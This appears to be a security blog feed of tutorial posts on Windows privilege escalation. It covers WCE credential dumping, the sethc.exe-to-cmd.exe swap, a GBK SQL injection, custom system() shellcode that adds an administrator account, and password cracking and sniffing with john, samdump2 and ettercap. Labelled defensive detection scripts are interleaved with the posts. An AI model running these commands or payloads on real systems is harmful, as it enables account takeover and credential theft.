Security – GoSecure! https://www.gosecure.it/blog (feed dated Fri, 27 Jun 2014)

Privilege escalation using Windows Credential Editor
https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/ (Fri, 27 Jun 2014)

As I wrote in this article, it is often trivial to become local admin on an MS system if there isn't a strong and clear security policy; the same is true in a Unix environment.
What is the next step? If an attacker becomes local admin of a company PC, the next step is to become a more powerful administrator; so, if the PC is joined to a domain, the objective will be to become a Domain Admin in order to completely compromise the whole network.
Here is a tool that can be used to reach this goal under particular conditions: Windows Credentials Editor (WCE v1.3 beta).
It's quite simple to use:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>wce.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windows cache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

Let's try to run WCE using the -w option. Note that you must be a privileged user to run this tool.

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\CLI01:Pa$$w0rdZ

C:\Documents and Settings\Administrator>

It's pretty simple: WCE shows every cached password, in clear text.
Let's assume that the PC CLI01 is joined to a domain and let's see what happens if some service is started using the domain admin password:

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\mydomain.local:MyPaZZw0rd_IsW3ry$tronG
Administrator\CLI01:Pa$$w0rdZ

WOW! The domain admin password stored locally is shown.

How many services are misconfigured in your network? Let's hope very few, because you are a very good sysadmin and no service starts with a sensitive domain password, but what about social engineering?
Each time a user begs for a password for an installation, or asks you something that leads you to type your admin password on his PC, is it a legitimate request or does he want your password cached?
So, you domain admin, what kind of password do you use on company users' PCs? The domain-admin-super-God password or the local PC password?

Based on this and the previous post, let's now compile a hypothetical roadmap from simple user to domain admin:
1- Boot the company Microsoft PC using a CD/DVD with a bootable operating system
2- Use the sethc "feature" to become local admin
3- Beg for a domain admin password ("Please, I need the latest Java update, but I need your password", "I'm trying to add a new charset, but the PC is asking for an admin password...")
4- Run WCE and become domain admin
5- Use some other tool like pstool and collect the password of every user of the network

I think these are the defences that a network/system admin can adopt:
1- No external device boot allowed, and PC and case locked
2- No remediation on this (maybe some domain policy). Remember that Linux also has a level 1 (single-user) boot.
3- Users are invasive and dangerous, even if they don't want your password. So always log on to their PCs with the lowest privileges you can.
4- WCE must be blocked for users (AV rule, policy, firewall)
5- If an attacker reaches this point you will probably spend the next weeks searching for another job in another city
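A defender's check for the misconfiguration the post keeps coming back to (a service started with a domain account's password, which then sits in the workstation's logon session cache), as an added example that is not part of the original post: it parses the CSV that `wmic service get Name,StartName /format:csv` prints and flags every service whose logon account is a real user rather than a built-in principal. The CSV below is constructed for the example, and the host name, service names and the `MYDOMAIN\Administrator` account are made up.

```python
"""Audit which Windows services run under a non-built-in account.

Added example, not from the original post.  Feed it the text printed by
``wmic service get Name,StartName /format:csv`` (run on the host, or on a
management box against a remote node); the sample below is constructed.
"""
import csv
import io

# Principals Windows manages itself; no reusable password is cached for them.
BUILTIN_PREFIXES = ("nt authority\\", "nt service\\")
BUILTIN_NAMES = {"", "localsystem", "nt authority\\system",
                 "nt authority\\localservice", "nt authority\\networkservice"}


def is_builtin_account(start_name: str) -> bool:
    name = start_name.strip().lower()
    return name in BUILTIN_NAMES or name.startswith(BUILTIN_PREFIXES)


def is_domain_account(start_name: str, hostname: str) -> bool:
    """True for DOMAIN\\user where DOMAIN is neither '.' nor the machine
    itself, and for the user@domain (UPN) form."""
    name = start_name.strip()
    if "@" in name:
        return True
    if "\\" not in name:
        return False
    domain = name.split("\\", 1)[0].lower()
    return domain not in (".", hostname.lower())


def audit_services(wmic_csv: str) -> list:
    """Return [(service, account, is_domain)] for every service that does not
    run under a built-in principal.  Input is the raw wmic CSV text."""
    # wmic prints a leading blank line before the Node,Name,StartName header
    rows = [ln for ln in wmic_csv.splitlines() if ln.strip()]
    findings = []
    for row in csv.DictReader(io.StringIO("\n".join(rows))):
        account = row.get("StartName") or ""
        if is_builtin_account(account):
            continue
        findings.append((row["Name"], account, is_domain_account(account, row["Node"])))
    return findings


# Constructed sample in the wmic CSV layout: host CLI01 from the post, with
# one service running as a domain admin and one as a local account.
SAMPLE_WMIC = """
Node,Name,StartName
CLI01,Spooler,LocalSystem
CLI01,Dhcp,NT AUTHORITY\\LocalService
CLI01,BackupAgent,MYDOMAIN\\Administrator
CLI01,UpdateSvc,.\\svc_update
CLI01,W32Time,NT AUTHORITY\\LocalService
"""

if __name__ == "__main__":
    for svc, acct, is_dom in audit_services(SAMPLE_WMIC):
        print(f"{'DOMAIN' if is_dom else 'LOCAL '} account: {svc} runs as {acct}")
```

Any domain account in the output is exactly the case shown in the second WCE run above: the service's logon password is cached on that workstation and a local admin can read it. The fix is a per-service managed or local account with the minimum rights the service needs, never a domain admin.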

The scope of this post is to make system administrators and everyone else aware of how to take care of IT security.
Many times, working as sysadmins, we make mistakes, we are under pressure and we sometimes leave ports open saying "I will patch them later", but we always have to remember what risks we are taking.
An attack, talking about computers and networks, often starts from the bottom and, little by little, tries to reach the top; a small open door gives the way to another gate and so on. This process is called Privilege Escalation.

Sethc: Access to every PC and become local Admin
https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/ (Wed, 21 May 2014)

This article talks about connecting to a PC when you don't have the password and:
– you have physical access to the pc
– you can boot from a CD/usb/other HD

This is an old method that I rediscovered after many years and, to my big surprise, it is still present on modern MS operating systems (Win 7 and 8).
At the base of this "feature" I'm going to describe there is a Windows executable: c:\windows\system32\sethc.exe (but it's not the only way: you can also use shutdown.exe).

If you have a Windows system you can activate this program by pressing the left SHIFT 5 times; this operation runs the executable (sethc.exe).

There are two problems if you analyze this situation: first, it can also be run at the login screen before authentication; second, the privilege used to run the executable is SYSTEM (at the login screen no user is logged in yet).
This is quite terrible.
Before, in XP SP2 and early XP SP3, this file was used to escalate privilege without physical access to the PC: the file was accessible by everyone and was not locked by the system, so a user could remove the legitimate sethc.exe, copy cmd.exe from the same folder and rename it to sethc.exe.

What was the window that popped up when the user hit SHIFT 5 times after this alteration? A CMD shell! What was the privilege of this shell? System!
Luckily Microsoft patched this problem in late XP SP3 and now the file is locked and can't be manipulated while the operating system is running, but sethc.exe is still there.

Some weeks ago I had some problems accessing a Windows laptop (Win 7 SP1). Although I had the authorization to access it, I didn't have the password to log in and no options to recover it, so I tried this:
I inserted a Linux bootable CD and booted the PC from it. Then I simply mounted the Windows file system and used some commands like these:

[root@localhost /]#  mkdir -p /media/c
[root@localhost /]#  mount -t ntfs /dev/hd02 /media/c
[root@localhost /]#  cd /media/c/Windows/System32
[root@localhost /]#  cp sethc.exe _sethc.exe
[root@localhost /]#  cp cmd.exe sethc.exe

Then I rebooted the system from the HD and, at the login screen, I simply pressed the left SHIFT 5 times. Ta-da! I got a SYSTEM shell.
I used a basic command line to create a new user and put it in the Administrators group and, less than 5 minutes later, I had full graphical control of the box.

This gave me a hundred ideas, so, having put this laptop aside, I went on with my tests.
I tried it on a Win8 box, on a domain PC and against a server with a strong domain policy, and every time it worked fine.

So this is my assumption (but you can refute it):
If you have physical access and you can boot from an external device (using the BIOS or physically adding a new HD to the PC case) you can log into a Windows PC with SYSTEM privilege.

That's why in every company that believes in IT security, external device booting, PXE, and access to the PC case must be regulated.

ASAP I will write some examples of becoming Domain admin starting from this point, to highlight how dangerous every little door that a sysadmin leaves open is.
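A detection for the swap the post performs (sethc.exe replaced by a copy of cmd.exe), as an added example that is not part of the original post: it hashes the accessibility helpers in System32 and reports any that is byte-for-byte identical to a command shell. The list of helper and shell names is an assumption (the usual set abused this way), the `build_fake_system32` layout is constructed so the check runs offline, and the System32 path is a parameter so the same check works against a mounted offline disk.

```python
"""Detect an accessibility binary that has been replaced by a command shell.

Added example, not from the original post.  A helper whose SHA-256 equals
that of cmd.exe or powershell.exe has been swapped; files that are not
present are skipped, so the check is safe to run on any Windows version.
"""
import hashlib
import tempfile
from pathlib import Path

# Assumed lists: the login-screen helpers commonly abused, and the shells
# they are usually replaced with.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32: Path) -> list:
    """Return [(helper, shell_it_is_identical_to)] for every tampered helper."""
    shell_hashes = {}
    for name in SHELLS:
        p = system32 / name
        if p.is_file():
            shell_hashes[sha256_of(p)] = name
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        p = system32 / name
        if p.is_file():
            shell = shell_hashes.get(sha256_of(p))
            if shell:
                findings.append((name, shell))
    return findings


def build_fake_system32(root: Path, swap_sethc: bool) -> Path:
    """Constructed System32 layout for offline testing: small stand-in files,
    with sethc.exe optionally replaced by a copy of cmd.exe as in the post."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "cmd.exe").write_bytes(b"MZ-fake-cmd")
    (root / "sethc.exe").write_bytes(b"MZ-fake-cmd" if swap_sethc else b"MZ-fake-sethc")
    (root / "utilman.exe").write_bytes(b"MZ-fake-utilman")
    return root


def demo(swap_sethc: bool) -> list:
    """Build a throwaway fake System32 and run the check on it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_swapped_binaries(build_fake_system32(Path(tmp) / "System32", swap_sethc))


if __name__ == "__main__":
    print("tampered:", demo(True))    # [('sethc.exe', 'cmd.exe')]
    print("clean:   ", demo(False))   # []
    # On a live host: find_swapped_binaries(Path(r"C:\Windows\System32"))
```

This catches only the copy-a-shell variant the post uses; a swap with any other executable is better caught by verifying the Authenticode signature of each helper or by comparing against a known-good hash baseline. The post's own mitigations (locked boot order and locked case) stop the offline write that makes the swap possible in the first place, and full-disk encryption of the system volume has the same effect.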

Mysql_escape_string: the charset vulnerability
https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/ (Wed, 16 Apr 2014)

mysql_escape_string is a deprecated and vulnerable PHP function used to sanitize user input before it reaches the MySQL query.
It escapes most of the special characters that can be used by a malicious user to perform SQLi.

This is an example of how the function works:

root@bt:~# cat /tmp/esc_str.php
<?php
        // Escape a string with the deprecated function and print the result
        function escape_str($s)
        {
                $mystr = mysql_escape_string($s);
                echo "mystr is: " . $mystr . "\n";
        }
        escape_str(" ' \ ; A B ! % ");
?>

root@bt:~# php /tmp/esc_str.php
mystr is:  \' \\ ; A B ! %

In spite of this, as you can see, some sensitive chars aren't escaped, like the % that can be useful in a LIKE query.

mysql_escape_string has some vulnerabilities partially patched by mysql_real_escape_string.
In particular, mysql_escape_string doesn't require an authenticated connection and can be called before the mysql_connect function.
This means that it doesn't check the database character encoding, but analyzes and sanitizes the string one byte at a time even if the database encoding is multi-byte (GBK, UTF-8, Big5).

Take a look at this example of MySQL authentication using PHP code:

function mysqllogin(){
   $db_name  = "db0001";
   $tbl_name = "tb0023";
   // Input escaped byte by byte, before any connection exists and with no knowledge of the charset
   $user = mysql_escape_string($_POST["login_user"]);
   $pswd = mysql_escape_string($_POST["login_pswd"]);
   mysql_connect("127.0.0.1", "root", "toor") or die("No MYSQL connection");
   // Connection charset forced to the multi-byte GBK encoding
   mysql_query("SET CHARACTER SET 'gbk'");
   mysql_select_db($db_name) or die("No DB connection");
   $sql = "SELECT COUNT(*) FROM $tbl_name WHERE user='$user' and pswd='$pswd'";
   $rsql = mysql_query($sql) or die(mysql_error());
   $rw = mysql_fetch_row($rsql);
   if ($rw[0]) {
      return 1;
   } else {
      return 0;
   }
}

If we suppose that the DB encoding is GBK (in this case I forced it in the PHP code: mysql_query("SET CHARACTER SET 'gbk'")), we can try to take advantage of the use of different encoding types.
First of all, let's use PHP to see the difference between GBK and ASCII, before and after mysql_escape_string().
Use the following PHP sample:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ascii">
<title>PERU.local</title>
</head>

<body style="font-family:Verdana;color:#9bbbcb;">
<div style="text-align:center">

<div style="text-align:center;color:#ff0000;">
=========================================================<br>
This is a php page with ASCII charset<br>
---------------------------------------------------------<br>
The string passed to mysql_escape_string is \xBF\x27<br>
The output of mysql_escape_string is \xBF\x5c\x27<br>
<br>
=========================================================<br>
</div>
<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<?php
$lol =  "\xbf\x27";
$lol2 = mysql_escape_string($lol);
?>
<strong>--------</strong>
</td>
<td style="text-align:left">
<?php echo "This is the string before mysql_escape_string: " . $lol; ?><br>
<?php echo " --- "; ?><br>
<?php echo "This is the string after mysql_escape_string: " . $lol2; ?><br>
</td>
</tr>
</table>
</div>
</div>
</body>
</html>
Image 1: the page rendered with the ASCII charset

Now modify the previous sample and load it again:

...
<meta http-equiv="content-type" content="text/html; charset=gbk">
...

Image 2: the same page rendered with the GBK charset


As you can see in image 2, the escape (\) char is no longer displayed; this is because the mysql_escape_string output is \xbf\x5c\x27.
This output is interpreted by ASCII (a single-byte charset) as "\xbf" (an inverted question mark), "\x5c" (\, the escape char) and "\x27" (', a single quote).
On the other side (GBK, multi-byte) the output is interpreted as "\xbf\x5c" (a kanji) and "\x27" (', a single quote).

OK, the string that reaches MySQL will be \xbf\x5c\x27; now, if the charset on MySQL is GBK, the behaviour will be the same as in the PHP page: a kanji and a single quote, which is what we need for a SQLi.
In image 3 you can see the actual result:

Image 3: the resulting SQL injection

The only encodings I found to be vulnerable are GBK and BIG5, because they are the only ones that accept \x5c as the second byte of a valid character.
But you can explore more by referring to this site.
Also, I couldn't find a way to force the DB charset before the MySQL connection, so I suppose that the SQLi can be reached only if GBK is already the DB charset.
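The byte-by-byte escaping problem described above, as an added example that is not part of the original post: a small Python model of both escapers and of the server-side parsing of the literal. `escape_bytewise` does what mysql_escape_string does (a backslash before each special byte, with no knowledge of the charset); `escape_gbk_aware` applies the rule a charset-aware escaper such as mysql_real_escape_string uses once the connection charset is GBK (a well-formed double-byte character passes through untouched, a lead byte with no valid trail byte is itself escaped so it cannot swallow the backslash inserted before the following quote); `quote_closes_literal` is a simplified, assumed model of how the server lexes a GBK string literal, used only to show whether a bare quote survives. The GBK byte ranges are the standard ones; the payload and the function names are constructed for the example.

```python
# Model of byte-wise vs charset-aware escaping of a GBK string literal.
# Added example, not from the original post.

# Bytes MySQL escaping rewrites, and the sequence each becomes.
SPECIALS = {0x00: b"\\0", 0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\",
            0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z"}


def gbk_char_len(data: bytes, i: int) -> int:
    """2 if data[i:i+2] is a well-formed GBK double-byte character
    (lead 0x81-0xFE, trail 0x40-0x7E or 0x80-0xFE), otherwise 0."""
    if i + 1 < len(data) and 0x81 <= data[i] <= 0xFE:
        trail = data[i + 1]
        if 0x40 <= trail <= 0x7E or 0x80 <= trail <= 0xFE:
            return 2
    return 0


def escape_bytewise(data: bytes) -> bytes:
    """What mysql_escape_string does: one byte at a time, charset unknown."""
    return b"".join(SPECIALS.get(b, bytes([b])) for b in data)


def escape_gbk_aware(data: bytes) -> bytes:
    """Charset-aware escaping for a GBK connection: a complete double-byte
    character is copied untouched; a lead byte that does not form a character
    with the next byte is itself escaped, so it can no longer absorb the
    backslash inserted before the quote that follows it."""
    out, i = bytearray(), 0
    while i < len(data):
        n = gbk_char_len(data, i)
        if n:
            out += data[i:i + n]
            i += n
            continue
        b = data[i]
        if 0x81 <= b <= 0xFE:          # dangling lead byte
            out += b"\\" + bytes([b])
        else:
            out += SPECIALS.get(b, bytes([b]))
        i += 1
    return bytes(out)


def quote_closes_literal(escaped: bytes) -> bool:
    """Simplified (assumed) model of the server lexing the inside of a
    '...' literal under GBK: a double-byte character is consumed whole,
    a backslash consumes the byte after it, and a bare single quote ends
    the literal.  True means the literal ends early and whatever follows
    would be parsed as SQL."""
    i = 0
    while i < len(escaped):
        n = gbk_char_len(escaped, i)
        if n:
            i += n
        elif escaped[i] == 0x5C:
            i += 2
        elif escaped[i] == 0x27:
            return True
        else:
            i += 1
    return False


# Constructed inputs: the \xbf\x27 prefix from the article followed by SQL,
# and an ordinary value containing a quote.
PAYLOAD = b"\xbf\x27 OR 1=1 -- "
BENIGN = b"O'Brien"

if __name__ == "__main__":
    for name, fn in (("byte-wise", escape_bytewise), ("GBK-aware", escape_gbk_aware)):
        esc = fn(PAYLOAD)
        print(f"{name}: {esc!r} -> literal breaks out: {quote_closes_literal(esc)}")
    print(f"byte-wise output decoded as GBK: {escape_bytewise(PAYLOAD).decode('gbk', errors='replace')!r}")
```

The byte-wise result `\xbf\x5c\x27` is exactly the string the article shows reaching MySQL: under GBK the first two bytes form one character and the quote is bare. The charset-aware escaper instead emits `\x5c\xbf\x5c\x27`, where each backslash protects a single byte and the literal never closes. Escaping done with the right charset closes this particular hole; the robust answer given in the posts linked below is prepared statements with bound parameters, where user input never passes through the SQL lexer at all.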

You can read the following posts to get more info about mysql_real_escape_string and this kind of vulnerability:
https://security.stackexchange.com/questions/8028/does-mysql-escape-string-have-any-security-vulnerabilities-if-all-tables-using-l
https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
https://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string
https://stackoverflow.com/questions/3665572/mysql-escape-string-vs-mysql-real-escape-string
https://www.sans.org/reading-room/whitepapers/application/web-application-injection-vulnerabilities-web-app-039-s-security-nemesis-34247

Create a custom shellcode using System() function
https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/ (Mon, 20 Jan 2014)

Recently I had to write a custom shellcode that accommodates some specific features. Basically I had to avoid the use of some functions like WinExec() and ShellExecute() to create a remote code execution and insert it as payload in a test exploit.
I had to search for some other function that allows me to execute commands on a remote PC, and I found it in the system() call. I'm not a skilled developer, so what is described below is my working solution, maybe not the best solution.

I'm not talking here about the exploit, but only about the shellcode creation and the motivation for the choices. This example can be easily adapted to other situations and replicated without inserting it in an exploit, simply by testing it in a debugger or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to pop up a message:

[BITS 32]

mov ebx, 0x00584148 ; Loads a null-terminated string “HAX” to ebx
push ebx ; pushes ebx to the stack
mov esi, esp ; saves null-terminated string “HAX” in esi
xor eax, eax ; Zero our eax (eax=0)
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value HAX\00)
push esi ; Push the second parameter (lpText) to the stack (value HAX\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x7E45058A ; Move the MessageBoxA address in to eax
call eax ; Call the MessageBoxA function with all parameters supplied.

Looking up the MessageBoxA function in Google reveals four arguments:

int MessageBox(
  HWND hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT uType
  );

So the sample code pushes all the arguments onto the stack and then calls the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is inserted (\x00)
– the arguments are pushed onto the stack in reverse order (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hardcoded and works only on the operating system the shellcode is written for.
– the hardcoded address doesn't work in a randomized address space context (ASLR or EMET)

Starting from this sample I want to use the system() function to pass commands to the interpreter (typically CMD.EXE); I searched the MSDN specifications and found that it needs only one parameter: the command I want to pass.

system(
  "echo A>%tmp%\xx.txt"
  );

First I have to determine, using the debugger, whether the function is loaded in memory, so in Olly I search in "Names in all modules" and, luckily, I find it in msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 2


OK, now I have to convert the string "echo A>%tmp%\xx.txt" to hex, cut it into groups of 4 bytes and invert the order of the groups; I also have to remember to insert the NULL byte at the end of the hex string. These groups will be placed on the stack using the push instruction, and then a pointer to them on the stack will be passed as the argument.

root@bt:~# echo -ne 'echo A>%tmp%\xx.txt\x00' | xxd -ps | fold -w8 | tac
74787400
5c78782e
746d7025
20413e25
6563686f

So the test shellcode will be like this:

[BITS 32]

PUSH 0x74787400 ; push into the stack, in reverse order, the command 'echo A>%tmp%\xx.txt' adding a NULL byte
PUSH 0x5c78782e
PUSH 0x746d7025
PUSH 0x20413e25
PUSH 0x6563686f
MOV EDI,ESP ; adding a pointer to the stack
PUSH EDI
MOV EAX,0x77BF93C7 ; calling the System() function using the hardcoded address (XP SP3)
CALL EAX

OK, now I have the test shellcode; I can try it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a breakpoint at the end of my code and run the program (Figure 3).
Remember that msvcrt.dll must be one of the modules loaded by the program attached to the debugger.

Figure 3


Once the shellcode has finished I verify its work: I go to the %tmp% folder and look for the xx.txt file; if all is OK I can insert a better command like net user test Pa$$word1234 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add

Note that net user/net localgroup need admin privilege to be executed, so in a real exploit the target program must be started with elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

The Password Attacks on Kali Linux. [Part 2]
https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/ (Wed, 06 Nov 2013)

This is a part of my article "The Password Attacks on Kali Linux" published in PenTest Magazine.
I have the right to give up to 100 downloads of that magazine, so if you are interested in it you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 2]

Offline Password attack
A service that uses a keyword for authentication needs to store it somewhere and somehow. Think about /etc/shadow or the SAM in Windows, but also browsers, routers, switches and any kind of client (FTP, e-mail, SMB). The password can be stored in clear text, in databases or hashed in files; every time you copy these files and then try, even in another environment, to extract the passwords, you are performing an offline password attack. With administrative rights it is possible, for example, to dump password hashes from Windows and Linux systems. The same operation can be done by mounting the target system disk on the Kali system, even without credentials, or by starting the system to attack with a bootable Kali distribution.
Files that contain hashed or plaintext passwords can be found everywhere: sometimes the database backup is directly hosted in a web folder, let alone files named password.txt that can be found directly using Google; also htaccess and htpasswd files can sometimes be dumped. FTP clients, zip files and RDP connection files are a mine of keywords easy to collect too. Sniffing traffic waiting for a POP3/SNMP clear-text request or capturing a 4-way handshake from an access point are just other options you have to perform an offline attack.
Remember that keys are often reused throughout the network, so a complex password simply sniffed with Wireshark in an unencrypted packet like POP3 (see Figure 1) can be the same unbreakable, encrypted 15-char password used for the SSH service.

Figure 1: A sample of packet sniffing using Wireshark

Windows SAM file and Linux shadow
Windows stores the hashes of local passwords in a file named SAM ("Security Accounts Manager") present in c:\windows\system32\config\. Of course the file isn't plain text, but it has to be merged with another file (SYSTEM) present in the same folder. The union of these two files leads to a readable one where you can see the password hashes, just like those in Figure 2.
These two files can be accessed only when the operating system is down or using tools like PWdump or FGdump. The other choice is to dump the system backup of these; in fact, up to Windows Vista, you can find them in the c:\windows\repair\ folder. To merge the SAM and the SYSTEM file you can use bkhive and samdump2; after getting the hashes, John the Ripper is used to extract the passwords.

root@kali:~# bkhive /mnt/ntfs/Windows/System32/config/SYSTEM /tmp/bootkey
root@kali:~# samdump2 /mnt/ntfs/Windows/System32/config/SAM /tmp/bootkey > /tmp/win_hash.txt
root@kali:~# john /tmp/win_hash.txt

As said previously, if you own the target machine, you can take advantage of tools like FGdump too or, if you have established a meterpreter session, of the hashdump command (see Figure 2).

Figure 2: The hashes extracted using the hashdump command in Metasploit

Note that you need to be Admin or System to launch these commands, and you have to upload to the target machine some lines of code that can sometimes be blocked by antivirus.
Since it's one of the "most wanted" tools, let's also see JtR in action:

root@kali:~# john /tmp/win_hash.txt
Loaded 15 password hashes
NINAANI (nina:1)
(peru)
PASSWOR (Administrator:1)
PASSW0R (user:1)
AAAAAAA (jasmine:1)
N (nina:2)
D (user:2)
D (Administrator:2)
COS (nick:2)
A1 (jasmine:2)
DE (albert:2)
CR3T (joy:2)
CYBERDU (albert:1)

Note that most passwords are immediately cracked (nina, administrator, user, jasmine, albert, peru) while others only in part.
This is caused by the old Windows method of storing passwords called LM. This kind of hashing, stored next to the newer NTLMv2, is present by default up to Vista to guarantee backward compatibility. LM can be disabled, and Microsoft recommends that, but de facto this is a vulnerability that users have been carrying on for many years.
The LM hash works as follows:
• the user password is converted to an all-upper-case string;
• the password is cut after 14 bytes (max password length);
• the password is split into 2 pieces of 7 bytes max;
• these two pieces are encrypted using DES.
This is a simple view of what LM is, but what matters to you is that JtR has the task of cracking a hash of no more than 7 upper-case chars. This is really different from finding a key of 14 chars, upper and lower case. In addition to this, the DES kind of encryption is well known and John uses this to speed up the work.
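The LM split described above, as an added example that is not part of the original article: `lm_halves` performs the pre-processing steps (upper-case, cut at 14 bytes, NUL padding, split into two 7-byte blocks; the DES step that turns each block into the stored hash is not reproduced, and latin-1 stands in for the OEM code page LM actually uses), and `join_john_halves` parses the john output shown above, where `(user:1)` and `(user:2)` mark the first and second half, and reassembles a password only when both halves are known. The function names are mine and the sample input is the session reproduced above.

```python
"""Why LM hashes crack as two independent 7-character halves.

Added example, not from the original article.
"""
import re


def lm_halves(password: str) -> tuple:
    """Return the two 7-byte blocks that LM feeds to DES for this password.
    latin-1 is an assumption standing in for the OEM code page."""
    data = password.upper().encode("latin-1")[:14].ljust(14, b"\x00")
    return data[:7], data[7:]


# "CRACKED (user:half)" or "CRACKED (user)" for a password found in one piece.
LINE_RE = re.compile(r"^(?P<text>.*?)\s*\((?P<user>[^:()]+)(?::(?P<half>[12]))?\)$")


def join_john_halves(john_output: str) -> dict:
    """Map user -> recovered password, or None while one half is still missing.
    A line without a ':1'/':2' suffix is a password cracked whole (here the
    empty password of 'peru')."""
    halves = {}
    for line in john_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue          # skip 'Loaded N password hashes' and similar
        slot = int(m.group("half") or 0)
        halves.setdefault(m.group("user"), {})[slot] = m.group("text")
    result = {}
    for user, parts in halves.items():
        if 0 in parts:
            result[user] = parts[0]
        elif 1 in parts and 2 in parts:
            result[user] = parts[1] + parts[2]
        else:
            result[user] = None
    return result


# The john session from the article, reproduced as sample input.
JOHN_OUTPUT = """\
Loaded 15 password hashes
NINAANI (nina:1)
(peru)
PASSWOR (Administrator:1)
PASSW0R (user:1)
AAAAAAA (jasmine:1)
N (nina:2)
D (user:2)
D (Administrator:2)
COS (nick:2)
A1 (jasmine:2)
DE (albert:2)
CR3T (joy:2)
CYBERDU (albert:1)
"""

if __name__ == "__main__":
    print(lm_halves("Password1"))   # (b'PASSWOR', b'D1\x00\x00\x00\x00\x00')
    for user, pw in sorted(join_john_halves(JOHN_OUTPUT).items()):
        print(f"{user}: {pw if pw is not None else '<one half still uncracked>'}")
```

Two things the output makes concrete: a password of 7 characters or fewer leaves the second block all NULs, so its second LM hash is a constant that reveals the length class at a glance; and because each half is attacked on its own, a half already cracked (CYBERDU, CR3T) leaks most of the password before the other half falls. That is why disabling LM storage, as the paragraph above says Microsoft recommends, matters even where NTLM is also stored.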

Linux, too, stores keys in two files: /etc/passwd and /etc/shadow. In this case merging the two files is not essential, but it's better for cracking. You can use the JtR command unshadow to join the two.
In Kali Linux you can call any tool from anywhere on the system, as every application is included in the system path, so you can call unshadow and john just like this:

root@kali:~# unshadow /etc/passwd /etc/shadow > psw_file

Then you use john to crack it:

root@kali:~# john psw_file

Sometimes you can try to use john on /etc/shadow without unshadowing it, but in this case john will not use the GECOS info (full name, telephone number...) that helps to perform a better crack. Also the use of some features like -shells will be lost if you don't perform the unshadow.

A few words about using Google as a hash cracker.
Google is a big container of everything. It's not unusual to take a hashed string, paste it in the browser and find the key.
One of the easiest hashes to find is the MD5 one. The Message Digest algorithm 5 is an old hashing method; it is already obsolete and insecure, but users and programs still employ it to encode passwords. If you paste an MD5 string in Google you'll likely find it. Before trying anything else, paste the hash in the search engine or use some online rainbow table service.

The cache and the sniffing
Although the cache and packet analysis are not pure offline password attacks, they deserve to be mentioned. If you finally own a PC in the network you have to test, squeeze it. Extract everything you are able to take.
First start a sniffing session using Wireshark or, if you can't, use Ettercap to perform a man in the middle and wait for unencrypted passwords. These are some normalized outputs of Ettercap. The first is the capture of a webmail account on an insecure HTTP page instead of the more secure HTTPS:

root@kali:~# ettercap -T | grep password
webmail_username=nina&webmail_password=ThisIsMyPAZZWORd HTTP/1.1 302 Found.

Then some captures of POP3 and FTP packets:

root@kali:~# ettercap -T | grep PASS
PASS $$up3rPasW0rsS3creT.
